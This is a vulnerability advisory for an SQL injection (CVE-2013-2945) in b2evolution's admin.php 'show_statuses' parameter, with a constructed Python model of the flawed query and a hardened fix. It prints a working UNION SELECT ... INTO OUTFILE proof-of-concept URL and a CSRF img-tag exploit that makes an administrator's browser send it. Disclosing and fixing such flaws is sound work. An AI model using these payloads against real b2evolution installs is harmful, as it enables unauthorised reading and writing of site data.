b2evolution contains a flaw that allows an SQL injection attack. The issue is due to the /blogs/admin.php script not properly sanitizing user-supplied input to the 'show_statuses' parameter before using it in a database query. An authenticated administrator (or an attacker who can make one issue the request, see the CSRF vector below) can inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.
1) SQL Injection in b2evolution: CVE-2013-2945
The vulnerability exists due to insufficient validation of the HTTP GET parameter "show_statuses" in the "/blogs/admin.php" script. A remote authenticated administrator can execute arbitrary SQL commands in the application's database.
Depending on database and system configuration, the PoC below writes the MySQL version into a file "/tmp/file.txt" on the database server. INTO OUTFILE only succeeds when the application's database account holds the MySQL FILE privilege, the target file does not already exist, the directory is writable by the mysqld process, and secure_file_priv does not restrict the path; where any of these fails the injection itself still works and can be confirmed with a different payload (a boolean or time-based probe, or a UNION that returns data into the page). The payload is shown unencoded; in a real request the quotes, spaces and parentheses must be URL-encoded:
http://[host]/blogs/admin.php?submit=Search&ctrl=items&tab=full&blog=1&show_statuses=1') )) UNION SELECT version() INTO OUTFILE '/tmp/file.txt' --
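The payload above closes a quoted string and three open parentheses, appends a UNION, and comments out whatever followed. The following is an added example, not b2evolution's code: a constructed model of a query that is vulnerable in exactly this shape, beside a hardened version that validates the status list against a fixed vocabulary and binds the values as parameters. The table layout, column names and the list of allowed statuses are assumptions for the demonstration, and SQLite stands in for MySQL (so the injected function is sqlite_version() rather than version(), and INTO OUTFILE is not modelled).

```python
import sqlite3

# Constructed sample rows standing in for the items table (assumed schema,
# not b2evolution's real one).
SAMPLE_ITEMS = [
    (1, 1, "published", "Hello world"),
    (2, 1, "draft", "Unfinished post"),
    (3, 2, "published", "Other blog"),
]

# Assumed vocabulary of legal post statuses; the real application has its own list.
ALLOWED_STATUSES = {"published", "draft", "deprecated", "private", "protected"}

# The advisory's payload, with sqlite_version() in place of MySQL's version().
# The trailing space after "--" matters for MySQL, which only treats "-- " as a comment.
PAYLOAD = "1') )) UNION SELECT sqlite_version() -- "


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (post_ID INTEGER, post_blog INTEGER, "
               "post_status TEXT, post_title TEXT)")
    db.executemany("INSERT INTO items VALUES (?, ?, ?, ?)", SAMPLE_ITEMS)
    return db


def vulnerable_query(db, blog, show_statuses):
    """Model of the flaw: the comma-separated status list is pasted into the SQL text.
    The nesting ( (...) AND ( ... IN ('...') ) ) gives the three ')' the payload closes,
    so "1') )) UNION SELECT ... -- " yields a syntactically valid UNION query."""
    statuses = "','".join(show_statuses.split(","))
    sql = ("SELECT post_ID FROM items "
           "WHERE ( (post_blog = %d) AND ( post_status IN ('%s') ) )" % (int(blog), statuses))
    return sorted(row[0] for row in db.execute(sql))


def hardened_query(db, blog, show_statuses):
    """Fix: accept only known status names, then bind every value as a parameter
    so user input never becomes part of the SQL text."""
    wanted = [s.strip() for s in show_statuses.split(",") if s.strip()]
    unknown = [s for s in wanted if s not in ALLOWED_STATUSES]
    if unknown or not wanted:
        raise ValueError("unknown post status: %r" % unknown)
    placeholders = ",".join("?" * len(wanted))
    sql = ("SELECT post_ID FROM items "
           "WHERE post_blog = ? AND post_status IN (%s)" % placeholders)
    return sorted(row[0] for row in db.execute(sql, [int(blog)] + wanted))


def demo():
    """Runs both variants against a legitimate value and against PAYLOAD."""
    db = make_db()
    legit = vulnerable_query(db, 1, "published,draft")      # [1, 2]
    injected = vulnerable_query(db, 1, PAYLOAD)             # [<sqlite version string>]
    hardened_legit = hardened_query(db, 1, "published,draft")  # [1, 2]
    try:
        hardened_query(db, 1, PAYLOAD)
        rejected = False
    except ValueError:
        rejected = True
    return legit, injected, hardened_legit, rejected


if __name__ == "__main__":
    legit, injected, hardened_legit, rejected = demo()
    print("vulnerable, legitimate input :", legit)
    print("vulnerable, injected payload :", injected)
    print("hardened, legitimate input   :", hardened_legit)
    print("hardened rejected payload    :", rejected)
```

With the vulnerable variant the injected query returns a single row holding the database version string instead of post IDs, which is the same primitive the PoC uses to write version() to disk on MySQL. The hardened variant rejects the payload before any SQL is built; parameter binding alone would also stop the injection, but the whitelist is the natural fix because show_statuses can only ever hold a handful of known names.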
This vulnerability is also exploitable via a CSRF vector, since the affected request carries no anti-CSRF token and is a plain GET. An attacker who is not an administrator can therefore trick a logged-in administrator into visiting a malicious web page that issues the request with the administrator's session cookie.
Basic CSRF exploit (the same payload, which a browser sends automatically when the image is loaded; the URL is again shown unencoded):
<img src="http://[host]/blogs/admin.php?submit=Search&ctrl=items&tab=full&blog=1&show_statuses=1') )) UNION SELECT version() INTO OUTFILE '/tmp/file.txt' --">